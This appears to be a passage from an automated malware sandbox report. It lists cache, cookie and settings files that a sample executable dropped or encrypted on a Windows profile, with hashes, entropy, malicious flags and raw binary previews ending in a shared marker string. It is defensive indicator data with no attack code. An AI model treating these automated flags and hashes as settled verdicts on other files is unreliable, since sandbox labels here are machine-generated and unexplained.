                                                                                                                                                                                                    SHA-512:F6BB462E93C82E5A2E702905AEE96D6AC9BC710709A0F2E60FDB906C2870971AAE8154D1134742D54BDBB8C73C1E7D50DF498799A566E2F4ADC4BA81387C69BF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .9.&..;KE...Vz.s+SQ....d..a.NXGZ.)r&.....^....%....3.'...V....c...T.P..'.taC....bA.(..'xn.L......$...;.I..Y).CE...{.....Q^....[..i..f....Z.[.-bu..p.j.p..1...c~(.Y9.c4..j.C..PK.8.&VnY..U!%..1h.o..g.a.)6.....GZvga..5G.HG..F.....e..'A).VH._.OY.N.7,}....M.....<..a..wFYRM.S./..9.r..:.{RJ5...yDo..h.....&Bh7.T0..^t.N.1..6...j....>d....8E.vJ.\..9.3./.h^...p.2.e."qk..5./..C.kf....j.a..@.0.........Ig.E..B.q..`...(.k..o..k9.C.b.FX.|..Z....oQ...x.....Dw.....8...\Vh.KIEJ..^...<..6?.m. ......Lp.D.p.+..:..)....H..,].$%W.F.O..[YI9?.~#...o>.."......7.......t5...K5^.6Tq..A.@....F.<^6@W.Z?x....SXr.`*......-.;5%..F..$M....v........r.]].n.!.=.....n?.L.5...}.q..y.,%C...U..p...{......n)..+..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\qtrWr26X2qDu6oNpJ0ZLPBT4EsA.gz[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):606
                                                                                                                                                                                                    Entropy (8bit):7.576105363816672
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:nfOSkAOWhuxc9YPi3AMTRwZ7k8P800Ygjr5PzBWHo9/TchK1y3okmW2X/Iucii9a:nJkAhEq9zAMTRg7kMl0YwJqo9eR3V+bD
                                                                                                                                                                                                    MD5:5C8DB0FFD9610202DED1DCED3DDD2331
                                                                                                                                                                                                    SHA1:9F5213A31B46DD96FBB9C3BB92FF01EB7E6EA118
                                                                                                                                                                                                    SHA-256:2B825E954800BB848340431D4EAA58B6BB80ADDCF489B0CB939302EBF8851613
                                                                                                                                                                                                    SHA-512:159AA627D86FCA89A4F6D430385ADE12B0CF681FC1A01ADB6FA5A494C08F2A2E5A332A668B5D5DD05C1B4327A4D40C0A1714B3B46D377F0CD411E1371D818EB0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .%........U.-vO...0..x~.r..b6[EY..S.D.J@..>....|..a#.0a..4W.j...y...#.(...#k...&~..T@.....>.%........,....r........U'.6...B..[t%....`.J.#1..Y.|8zS....J...Y.........BvC..t...=h.rm.u.!..y...........{SL/....m`~;B\.....M..y......Q.....b1..'..#..%.9....:...h......9.%....`.....I...9.......kk.RV.[#..s....b.'.c>.....#.A..pM.s..n.qu.E.-WU...7./.b.R5@........<...X..Q.u!.....Hr 5w3..6........y..p..a.i.....M..u..#..d?.n.E/......;...?*...W....e..........c.eA...]._.!.f..l.%.>O..E..Y...x...]Z...5h..@.D.&...7A65VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\sbi[1].htm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):45242
                                                                                                                                                                                                    Entropy (8bit):7.99619725709734
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:rVbXwIShzijf6wR/RSRgsU3EO6u6wl9PhKQ9pv/k+Ae/pmjQSlOZFag7nfUZ3tMp:p8Ji2wF2gl4u6wl9P8QXU/e/pm0SAZFD
                                                                                                                                                                                                    MD5:B7FCF678F3E49D3ACE9C6EAB23749B45
                                                                                                                                                                                                    SHA1:AE0BAAAB42828946D5A0CD2EDC9CF4DF7CDF484F
                                                                                                                                                                                                    SHA-256:516461409CE80A9E78159B10860AFC8E6D14B12107FDFE57D7BCA020CD372C31
                                                                                                                                                                                                    SHA-512:C02932B60C6F040B59AD98CF6FC7DBA5DFCFBB0DC83DA579B7D93ADE7555BD4723A97E4EC849D7229B65AD89678C4F7D6CB1D9699072BE4C422D2328706090D1
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .$.M....J+"...B.\7C.48.a*...z....q.6....MY.x...[A4t&..k.9.....-....sE../#1Q]...?.4....6.....z&.!v....-....w.9lm..O.......x..A...-2.E..6o..7....7.]V.=.&80...B.*..56BG..y....!..#.....1........&.A..t../..(.{.....SM.e.?.e..$?:(....x.o.q.`,y$....r...`.-/T... .k.:5...{...w......d..A.3.[i!..|.....M/.)!FW..".h.A.K.L..|.T...k!s.C...6or..8dS+.|.u....Q......p S[|.2..g9t...?.......*..H...2Q%....U..oVyy.^...2...:..JM.?........Q......^..p...myqJZ.=.&`ES"...bq.P.,.7n..{T.... .J..h...,\.....|3.b.........v.K.......~.u)."3...D.n.M,.._.UO..E^.ao.u....D...k.d|YF...x...P.<.x.y...Y..N.._....f\...E`.W......N..JB"...+x.....K.,Lit...S.qx.Z.s.8..G..b.P.;..8.#...F=}..>...sC,..j..QX...O..>...a..j....e^.T.......r....>l.b.SAVwPQ...........#......5&......n.S3e..o.....re.#..q.../E.O[..:....B.5... *.-..cs.C..{..>.b-]1.I.c...;..J.R......M[C..B{N......+R..L.T.v...u...."...N..>"......V..R.%..W...T6...4`....(..o....k.5..u.&...+....v@.-...}q..r.j.N.H....:.g.4.*#..M[.y.r.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\th[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):10827
                                                                                                                                                                                                    Entropy (8bit):7.983807521466922
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:q3DCu6Sj7wfgZZ1lpuUMqckPNn7MNgvfFlCzpnx+23HIf2bVHpJSrypth:yDnZ/lpuxqHn7MGvfzCzp44HIYNpf
                                                                                                                                                                                                    MD5:7924057AD3F1E55C0EBB706465496889
                                                                                                                                                                                                    SHA1:E9BB5F7E926B930B2A022FB40641FDBA4DC4A695
                                                                                                                                                                                                    SHA-256:0F1A8A53CBA17D751CA08EEC82B5EC9E6B810E155567DDB50491EB824B5EC1BA
                                                                                                                                                                                                    SHA-512:951BE2378D4AA3FA823AC8B8780673DAF3C65BC230E2753F624F4CA0BCFCB9006183C9B3FF86FAC7764AF570899DE2837B611AD06A7ADF6E0C2601ABE377168C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......W......a..|Un.Bi.B.o.`R.M?...$...<.......&H:9(m....UX....sd...'..o....]@m.-4m.....-n.J..........]l...q..a.....(.*~>.........1s.8..,oN..[m.....\Y....78............G....l.~G...a.L...(.T..&.T..%..?H6*1...,.}.d...~.j....8."......jtb...nX..9/..A..;g.......tv.1@...M...+..T..,.i(."Snz.s..Z*F.?l..c...)j3b.O1whq.6#z......(.e..B.v..E....1.....R...=.Mf..VpO^.T.b.c,.4..o.b.j.E.!4<../2..<P:l/3e.|.J...<c^....4.6#.s..0.......>..V./...1....'..fO..N...2.kg..}...RY......-(.x....t...^U....i.?...gT.:y.J.]td..s.......[.2][..w[{).......1D,..#.{Q......g.Iz..fB..xL.!j....(2arVQ..h.CYR&.0c#m.^B..p..t\..MbI.......G...,...2t.....z....gu.m..M\...]x.s.$.3.....$!F....l.\..}...u....>A4$_~.X~....E[@q...]..5....c...E..7.[X......[H4.5..7....d .P!.9..F..<.ord.....kU}...bj...k..cJ...jU.....4..l..C.P.n.6....IY....s..Y.ho.3.*.....Q....#..5<..@j..V.?5...3l<_x5IZ..V..U;*.].^lz.#U.@..W.....Z....4.w.|...s......b.._F34..... ...[*j...C.@O.Y.2........D@`.,.h.....0.m.. u
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\th[2].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2028
                                                                                                                                                                                                    Entropy (8bit):7.894103055186532
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:PnGaUZryuUZEuLWGS4YuWBgIAnSBob8BHdqfWGD:PGaUdVxuLvGVASug8fWe
                                                                                                                                                                                                    MD5:DA234BD237BBAF78262B457F888F5D1D
                                                                                                                                                                                                    SHA1:4B1F6D376FD81F9AAC8B0C55A7DCD652AEAABB9E
                                                                                                                                                                                                    SHA-256:58CA5E8199E9280F8C7F53FB5F14C636C5BEE37217C2A44266BE1F10D6C02D0C
                                                                                                                                                                                                    SHA-512:3EB6BB8A9A689E9EA256F4B5B867A10F86A2C02FB26958F2542E5FE3919A8795AFEE6047A2BFDD75C75BEED251FD0FFBC788EBFBACF3B38663E41E6D05B2D4C2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: z.z9".6S>Gm5..&..49/./..$d...j..E]..l....T o!,...[.....c..s...pQ.....#f.xj...lm..".~?.[.~y..>.0..5..#....\...z.h\Y..e.(.>h$..A.#.&...K'.~.!.[l.FH..Du....L'..7.0...8x...JS3>.....K....&.4.:,.Nx.....@2...O..$-..l..c>,....F..O....F...`[.0..I...j.j.!.1..M l.:k..e0_BC..YR....RW.&G5..<...."?...!w+..:VX>.>j..o..(_9..4..I.`\a...e..c;....j. .:).CO.1.=v'O..L`*.N..J.....*..7...2..r.Yn...[..K..A...\g..Hn..t..9()...DDG..@c............k...yp.a*..Aa>.....;.C...P.n..k...K^]@Kk.g..;{.......y^[.i.c.|.=n.l8....q....K.K.S+.....C..5..qY..d<..zt....(.-=..L.E._..T%...e.O.O:`.q\3X...U.H3.:.U..........Km....D.G..[4r3...".....a.;K.Ge .!.d_<1a......`2....A.].."..0.9P.......UrUX..v!D...zx(.1..(.3.....N....&I6..........C...TLW.ys...@.tn.l.].....F`<..= .,..."..bb...$.b..U..!.p/q..Z.LQ.6&t.Y{...%..~....P..&].....5VO.\..{..H^...P.".J..w.}.:.'<....J.Uw..p...6.......&.Z4O...Q..#.H..[..j..@..j.x2Y#c../..g.G[..U.}..2.)..:.OS...as.>(...&.|B.uc.L;.P#....d.......}.....N?'W
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\thankyou-animation[2].json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):37014
                                                                                                                                                                                                    Entropy (8bit):7.9949139789269354
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:deUJ3xQ4avKmCrhMGEeEYM6ZKa79/tu73/4GsBsuaU:d7FPhMGEeyIvuA
                                                                                                                                                                                                    MD5:F6BEAB01E15BB21A9AAB6E6A34FD3A2F
                                                                                                                                                                                                    SHA1:870BE3F693B60BB34AF35B7AAFFC5682211D295C
                                                                                                                                                                                                    SHA-256:F2F500C7552A6A68289C33BFA270F18D47F40E85FC0A965758FEF2158E644674
                                                                                                                                                                                                    SHA-512:1FA2456F20457855D6E0012D725B2CE0BE6F159F8E855E2C9F24BDC68D230A5612171975F6FA74BA510002619DC1ED2126DD551BBD092E0F0DBAC6608D4E454F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .{.3...CJ.U..c.5.i.U.&Q...j..s.u..N........w....."......?9`...1.....U]...Z..B.{..P.._.....)........$.S.O?..d.N.o.t-x"bv....}..K.8.l6mt.._.+;.B*..h...E.*_5.)..N.......:l/.B...</..}....P....nv....Em8#X..v....b.:...pv.....'......G......w....!.k...;Q.v ..pu....T.......[u..>.....I.......T|....6.%Nh1P.t..Cv{N...?..K........4e.....kV..."...o.*Z..NJ...=.Ql.6..#c`.c..S..{........x...v...Os.l2.2.7^y..sP..u..r-.+........PD.9....Y.4......d?...R.n.K. .quH].Ez..X,.~.7..|...'~\n.|."..{.u.S..C.|....r.v..w.M.n.^........ML..Y....{.....p...<h..b.z.T..p.C>7%.'h)-?.....o#&..<.C.......0.a.6d.....*...y._.A.I.....n12...o........%.`..!.#Tk'..\.cE..an.......mpW......l..r.Hu.S.\a..MI.4.>mM......V..{..r..~...U..~........B....&v`........a,`W......?..z.1:......>m...<.,.>......O.eR.L..0.......7Q.&..+.:.'..o\.Q4{q\.;..e.....E.87...P1...B...m.;..d.....n...F.,.....).h...O.7.....SQT.1!d.Xc......0....?fG.#...#L_p..g:xk.%.^.]Z..b...W......5..>..s.m..e...[.*A.f.zz"?DO...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\uYzy_SF_Qx-quOm8IecsaqSoOd0[1].svg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1729
                                                                                                                                                                                                    Entropy (8bit):7.885362402833686
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:iFaFNbw+kuxbKzXGuehq3+olzJusle2eLTZJ+LmEDT8p37BCIOI3WdXEWJFubD:3RRbKzXGPQlzJbls332Dwd7BCfoWqoKD
                                                                                                                                                                                                    MD5:DCADF38B54E733E1AE85ECA406A3B50F
                                                                                                                                                                                                    SHA1:7037C7F2C201914A4F7DC59F33C51EE11A5D0450
                                                                                                                                                                                                    SHA-256:EB529C76ADA6F7FD7AD46E4DE43FA948483AA73315B75077D6749ED397728B0E
                                                                                                                                                                                                    SHA-512:8F67E3377C574193DA5E1F5E9FA4E86BDFED14CCF3543F9A8FD0265DC85A678226818CC6B21047811C1F71F1B72BD5825999CDF79DA13B89C30484AC06C44A4B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .h..:..=.Yw..`....$.....j.......J.....?..NIl.$t.2...K[.9...-..8...e.C .z.t....o6.'.....V.. *...U...G>..VH.uD...<....',..)p.`........ . H......N..#.....6.,..y...O..L.....k...%u.,..9.&.b...v..c~p....,].J.N..5W.kK..v....e..7.....$.[F..W..p..#..d.Tn..#c....<...\.9e..8%...a.H...2..=^.M.k..._L ....X.H..Z....n...._.^.?,.Hp$.W".3........F3.jyD..\.D)....R#..a.)4......i......../..U.".5.6.3".....`2r^.i.].v..;1`X..+.-......h.y.......<S..n...#.M.G.V.u>^J.C..O.Yo)%N.a...Ly<..W.,.j.?K].7N.J.U].....4}....^.~....j._u.]....hN..._..<...^..s7...+..`..].b..).G.n...i.0.R....R.8.P9..v[.....W...@.{*........#n%....<.dWx..S...3}!!.....56.^...... ......?:[s....g.z...6:..........U.W.y..w@ii...nm.n.l.a......#Z.....I..=8..;..X..6..c........Rc.<.S.....AkX.Xq....:a..eBeq.m.5..3.....x...^..].T.{.....Q=.{..F..vmK*.....Whb...zb..{l>...>..&.N.9C.as.g..F&...=<...kn.Yn..r8..Z..|....|.....9<%.H.6I......m...X.r.x....*P..%..$q.)..[.`!.b..R....{~........1...o..'.J......4
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\wQuZE0P0Ree-dwv6ApPm_x8Ysfg.gz[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5685
                                                                                                                                                                                                    Entropy (8bit):7.964083010825295
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:e3+6Awa2oNFNQ7zc+upeuJZoSsprxDvH83KMDpdIgVzJx4QJbrcdCK:CdfQNQP6pTsLH83tpaazX4QhrcUK
                                                                                                                                                                                                    MD5:734C0DAEF53A561C8A4271CFC16251B7
                                                                                                                                                                                                    SHA1:9CAF8141B59CF0138E1516C3D8918824CEEBDDCD
                                                                                                                                                                                                    SHA-256:9286C5FF6CD79A967A9105B32071A27E4778CD0AF03C7AAA615BF703EBB24AF2
                                                                                                                                                                                                    SHA-512:0070A9E5F2C1E745F58366186E7255DB112635ABF37ACA6D6C4D4723C18DB44BF286A963E2978D6FAF9F6A540781BF9C8A01B35E7F46761A808A29FDC1EF69C8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .f.,..!85.....V.y.s.7...U....&..xA.2QM..*...UZ2#?..c...w7..~.l..s..LT}.n&.G..$K..i!1>.x.G}.....2.tL.\..f...j...6IR..8..t.i~.'...#G...C....e.=fh5a.g...d.r......9'..}.Z...`.z.34..7..U.3D.4..j...M..'.A.f..m...J.........KH.3./..I..)..8..R=....._u..:.....v....).rd.eBa.. :.7....].H.<I .-.......P..-..)...._.-{..(........X~....i..1i(...^S.........O0....I.Yq^@....."]JG....O:.HR.u...^j..q..."C.+..u.|..h...p.&..$T..iU{.......'.D........Ge.h.8;s"..3S.>.<.1.7.O#......77C..e.2M..5T.y[sh!/.....e$.g.....Z.......w.*.R.....nyi....#...m..a.:oe.xk.V.Ur.<.W.h~....o...{~.+psBO=i/I.O./.a7f4.....%...P....+s....e...*t*9.-.7.~..@[...I.....Ten..p.S..&....M..]...*v..va..+....C...6";...D.X..d.......y>.I..........C..e..2...1e....T..F....:S.Y...(.C4.....+cr.k.pc.g5..gU.MU .......a#!.....pb...VJ.=......I../..r...\:..?....[E\....;.b....K..Ac.1..?...`.t[..9|]..U..T.P._.n......~N....tAK......."jO....C.a.D..Q.1.B..sE.Tc.(.#'Z.v...c.....Kw.r..b:.....uK&..}.May.....2.Q/...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\wcp-consent[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998872362805386
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:5iwbPExfnsV6MfmuZSBi865rp+zB2os1yE17hALShtE8ns:5tb8FsV6MeuZJ1prog9GShtvs
                                                                                                                                                                                                    MD5:A2F3A3CFC0DEAC1E0D1B8EE45EB8E597
                                                                                                                                                                                                    SHA1:9F2CF772AAD160D06E49B988186EC0BEBCD1717E
                                                                                                                                                                                                    SHA-256:800F91D5122C871004A5800814CC406AFAFD6B00158ED5E9B4E85B1B982035B2
                                                                                                                                                                                                    SHA-512:B439BF6A7AB306F2FCEE392DF0D5819428E68DBCDE2DB6EF3FC5B870F22BF45B2B2D9B202B468C08C05197637D8D74DDC1DB8BED8160C71812204C0443F674BF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: b.m.!D..wv{..g.....T...p!..Hyub.am..1...{k.I......O.}.N.*..D&..)....U..6\;f.&:..o....#........P....<i.].$.......{....i........K.%}.....]...?~.j7..90.....1.^...../n..,.Pm..t..s..J...<.....v......7.h......j........)..CDi..`.x.v..%.?*f..C@f....V.....i?K.]Y...M$,..N.I...vJSqG...kC.*.....-.....[7.....S||........G..:D...8...o.x2G...S(._../gSJ....#S.H#-.s..p<b..x....7<fR.;`....nuZ.HN..J..[..4...+.E......I-..;.....L.....-AV..9.j..y..!..M{_k|..!..CA.)..q+.i.*..).....{.....r.....A.)....uz......E@8....7W)..1....~'.Z\VG.j...h..G.>.O+."..I..l.bk..ph<e..-.[.:....y[g*......X.\....5.~.M.v..k.w...S..qg.J(.3A..0g...7.t....xi..@.P.3..v.t..'...*n.x........&Ih(:.dK.c...(X.5.{Z'.Z....748..|@.6..H....+..-/puz.2....8...%...8.(S.g...V*.."y...&#+.(.O.T..I........'.i...(>.6..#..... .uP\..P.....}8aj~.....6.H..8}..n]&..#.......T.....xx.5DX....................8.]...Mb...<......U..B=...}.1...F+.....N...!......'.C.}..8.*.....G....G.}<...[ ......1.[.!.#P........|.x.....j
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\MSIMGSIZ.DAT
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):49449
                                                                                                                                                                                                    Entropy (8bit):7.996223556431898
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:5K+PkckeejprfnK4dy5zAjrArEriq6d3sfbXl0dP7XxGFZy/wblWAhiIyj/7qwSy:5KmqeeVrfnIAXTR6Y10RlGdsAjyj/9MS
                                                                                                                                                                                                    MD5:4121ACDF030008BC0FF78A98C71786FC
                                                                                                                                                                                                    SHA1:FB379605BE6DEC84579BB92B4AB507C447C9BA14
                                                                                                                                                                                                    SHA-256:9B09BD97C4A324B6B64AF8B82FB1387825992900F9D1544F9DAB03D9E7AE7609
                                                                                                                                                                                                    SHA-512:4410FD89B92B5B9D1C955FA7E263A2FAC75163446BA43AEB2D48E2FA599DB287A13B27CFB6C2A1AFC2C4C0570B0BC6905B6D6582BB2A692820D224A929E972F3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: NR=.....,...%Ce.v..AG'?..}....`%Pr.....l.wdIV|......r..dW.......Z..W.U9$.....f..@.#u...w.1...r.y%.dU.....r.S.........z.u..gZ'.E.,..p(V2.]B .........~..e3....I.n#8.<v..d.gD8Jp.>q......Z.h...{.f..2......?N.......[...8.l....?..^|3#..+d......v.0.H......O&....8i8.:V..5....&.,.....%&/...k.H..w}.P..[......HD+lN......U.xh.J..&.Y..Q....._....0}..0..w.N..O.m.yAF..g.k.)..w..':h|.q$5.;RZ.wJ.X.@j.V...i.-.yLQ......4..Y..S..z..........%E...RT.....v.mSYn.........b_K.BM_P.{..*...B..T\..0..Z.3..#.08.(T...2...T7.....>.[.4....d.2KDD.(..s!....e]2y.?.T.......L.5Iw.^.....mP.i.5............+n:u.....<qX.~..T...Ak....5;.vY%.|...ZZ.)h...XG..M.@.T..v..+s.$._`.!(....|.5.J..(e.....KmJ...0.a...-~p.~.&4j...:............p..7....1.+i..w.?oV^...W.NJ._.o..B..._wc.PO...bV........6....,2..z...5W..u...J|..}..h4....&...`.......y(.'..~..A.|w...........8....s.$0_|....o.N~8.....#C.6.*..+j.5.<.@.....(..N..r...G...&...^.p.....dC...m.;.`...H[.|A{......Vc.e*}..o......GC....h.%]=2{..g#..d+T...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\SmartScreenCache.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):123345
                                                                                                                                                                                                    Entropy (8bit):7.9984479785697395
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:smXAFbJ7NdCsN+DFEybevmXJPzVBKrHIkH0U37a:sJN38BeuJLGHIkU7
                                                                                                                                                                                                    MD5:C44177C4082037B0D79BB7162633EB23
                                                                                                                                                                                                    SHA1:58BC3DF955D7E81E361F3620E0AA6192C9373F87
                                                                                                                                                                                                    SHA-256:F3B3E9F8DC72D534267110E8293B049634EAF599A1D91D132AEA947C75CB9857
                                                                                                                                                                                                    SHA-512:32A1EBA62589B06FE45D33362203873A5FFE69F74EAFAEC3D8999B85F75200590C30F7B5A776042D07FD7DB76FFAF2C1E7BA6C2A7B5BC2A0F55A55FE0C67C917
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...{.....z.~^=..O].L.=..hW..J.....-V..j......+.u..Of.&|.t..J.]JM....n......?....Lm....(.....;.......D.^.W..-...W.HG...@<......%..T7.w.i...`t...{.o.`y7.4.... ..N).Tw. ..r..).....k./...hn._H..%.7.0 W=.4v...~.....O.X.\8S.0................W....!U..._..+].Q~....u..8p....M...m..C..j`>..l.....X..".(..utxY..3Vt....G...".. .X.U...m..4.y..)t"[|].!10..+.(.....]s.O..m..R./._=T]%....gAxl...E..l;.....z..a!A..1....3.N$..g....Re..vs...-?.<..N...)...[.A.....G.j~.....z.%j......}k...Q...Ij.[].cW.Yu.3-.....y...1..VvG.n&....&.uu.c.....s.Y.u...=..c..[.. .....q...D.2......Z.".L^......Mc2..8..YTdQlv.............5....^.;)j..Ax.V....LOa......Y...6a.Sn...<)]..u...U....fX...H.BG.wf9D.\vR|.....5..;=2p.....(......f4..pV.%`?..8..f.hq....j(.M..'^..#.....<[\i........E..=...%cZ$..p).....[..D.pgp?.[g.6G.9/~.W.z..kc.~..Z,X...J.....#.q-...g<.7.Nj.J..2..xQ.X.I.............Cz|c.5&m..vg.I...K7b...("#W..z.o.1$..&a,...j.Q..Gi.2...C. m....$>.2..B-3.,]..tY.J...x.......@Y...=.T
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):420
                                                                                                                                                                                                    Entropy (8bit):7.358484542177652
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:RvvDzH9NBM7Sh6uHGZBk7qOTnz5wQt3tgeyT061j41O2iFl75dExcii96Z:prb9N4CmZWPN3tgeyTFj41Pikcii9a
                                                                                                                                                                                                    MD5:E408DEEE3E9838BD343A586636E1F8E4
                                                                                                                                                                                                    SHA1:4B12DF78289C708D326B4B4E08E5F1BC8C273753
                                                                                                                                                                                                    SHA-256:4EC1A561E5A4787A3CF37E347E702D45B5A5423BEEC74165D5A5FC6840181CF8
                                                                                                                                                                                                    SHA-512:6EA60D30C49EEE5A0D5EFB3C50887DF617B08BFC79FC415E189EA4004690368F61DD1E2E478DE60E176BDDB5C9F1ACE914B362A55CACB475F8CAA2C787F332AC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ........9..f..l..~.7g.G.Pw4-.Mfz..._....b.-.\..|k.6R.".B_...n.........._..R{v.......b....WY{.#.@1..4....mH...^i.....@.0..OE..[...UB._.....?e.<..V.{i&.f.._-..L..0...............AR...)b...l..9.......u..7....B......]..Cj^Jb....b..}.4...h..-.P\.BP.X..v.q0.[D..k.\m~^...H$..q....r$..z1|..Ub...e..m.E..z.Zs..d^.G.@n.X[fSZ...bt5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):118270
                                                                                                                                                                                                    Entropy (8bit):7.998591655420999
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:qS7h36lMHtxw+1tBmNNmrDHDP9X4K0cRlCdEO6xmxkJ8Ejym8tJS/wTgiCf0tnN/:d36sxxVq27hXh7rx5J38cwTBRju45dSM
                                                                                                                                                                                                    MD5:158146869C2FE75C21F0A7DB8C15775C
                                                                                                                                                                                                    SHA1:3E624622AD04D621A5A7F632358D0DBB12953AAD
                                                                                                                                                                                                    SHA-256:0649B7F05D9882EEB1FCE38DDA28C2358A25EBB2777B17C20311E8E882A964AA
                                                                                                                                                                                                    SHA-512:F281A375DDDBE4DD1AAC378FDFBE442F6438887680F2C88134F76A5CDC6F2C7CAE6CB621608A4007A8A38FF14BEC9F207A7B27F721200958EA05BC4296C06DAD
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
